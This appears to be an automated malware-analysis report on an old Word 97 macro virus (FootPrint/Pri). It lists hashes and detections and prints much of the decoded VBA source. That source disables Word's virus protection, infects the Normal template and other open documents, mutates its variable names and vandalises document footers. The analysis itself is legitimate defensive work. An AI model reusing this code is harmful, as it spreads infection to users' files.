Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f231dbce31ced938…

MALICIOUS

Office (OLE)

43.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 44cb64182ef64e852837e1fab6612a91 SHA-1: acc437a4878d34182ee42b7d0ecb8f7eb03e8c7b SHA-256: f231dbce31ced9380e9e5d3ff138cca18ec36c38488c16fc34e041e2b7836a0a
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple detections, including 'Doc.Trojan.FootPrint-4' and 'Doc.Trojan.Pri-1'. The presence of a 'Document_Open' VBA macro suggests an attempt to execute malicious code upon opening the document, likely to download and execute a secondary payload. The VBA code itself is heavily obfuscated and truncated, preventing a detailed analysis of its exact actions.

Heuristics 3

  • ClamAV: Doc.Trojan.FootPrint-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.FootPrint-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17970 bytes
SHA-256: a6773ab7db8ccb0fa83d196eead02246183135507e1dcfa221b59cb4e876104a
Detection
ClamAV: Doc.Trojan.Pri-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Document_Close()
On Error Resume Next
Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
If Day(Now) = Minute(Now) Then
Randomize: For
= 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next AL3250: End If
PI9186 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
CU9793 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Pri" Then
Set AH77 = ActiveDocument.VBProject.VBComponents.Item(1)
IA3217 = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Pri" Then
Set AH77 = NormalTemplate.VBProject.VBComponents.Item(1)
CR4768 = True
Call OV1646_NJ830
ActiveDocument.Saved = True
End If
If CR4768 <> True And IA3217 <> True Then GoTo CM2464
If CR4768 = True Then AH77.CodeModule.AddFromString ("Private Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, PI9186 - 1) & vbCr & "Sub ViewVBCode()" & vbCr & "Application.Quit SaveChanges:=wdDoNotSaveChanges" & vbCr & "End Sub")
If IA3217 = True Then AH77.CodeModule.AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, CU9793 - 4))
CM2464:
If CU9793 <> 0 And PI9186 = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
End Sub 'W97M/PSD.II ...logically delicious! [(c)1998 ALT-F11 code hack]
Private Function OV1646_NJ830()
On Error Resume Next
Randomize
Dim r1(1 To 15) As String
r1(1) = "DR618": r1(2) = "MB872": r1(3) = "KG5522": r1(4) = "IF6887": r1(5) = "NJ830": r1(6) = "PI9186"
r1(7) = "CU9793": r1(8) = "IA3217":: r1(9) = "AH77": r1(10) = "CR4768": r1(11) = "CM2464": r1(12) = "OV1646": r1(13) = "QF861": r1(14) = "HS9530": r1(15) = "AL3250"
For AL3250 = 1 To 15
a1 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call NJ830(a1, r1(AL3250))
Next AL3250
End Function 'VAMP v1.0 [thanks Vic!]
Private Function NJ830(HS9530, QF861 As String)
On Error Resume Next
Dim DR618 As Long: Dim MB872 As Long: Dim KG5522 As Long: Dim IF6887 As Long
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
DR618 = 1: MB872 = 1: KG5522 = .CountOfLines: IF6887 = Len(.Lines(.CountOfLines, 1))
Do While .Find(QF861, DR618, MB872, KG5522, IF6887, True)
strline = .Lines(DR618, 1)
strline = Left(strline, MB872 - 1) & HS9530 & Mid(strline, IF6887)
.replaceline DR618, strline
DR618 = KG5522 + 1: MB872 = 1:
KG5522 = .CountOfLines
IF6887 = Len(.Lines(.CountOfLines, 1))
Loop
End With
End Function
Private Sub Document_New()
Document_Open
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim al As String
Dim adoc As Document
Dim atpl As Template
Dim CoL As Integer
ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$"
Open "c:\footprint.$$$" For Input As #1
Open "c:\footprint.$$1" For Output As #2
Line Input #1, al
Line Input #1, al
Line Input #1, al
Line Input #1, al
While Not EOF(1)
    Line Input #1, al
    Print #2, al
Wend
Close 1
Close 2
For Each adoc In Documents
    adoc.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text = adoc.FullName
    If Not adoc.CustomDocumentProperties("FootPrint1") Then
        adoc.CustomDocumentProperties.Add Name:="FootPrin
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.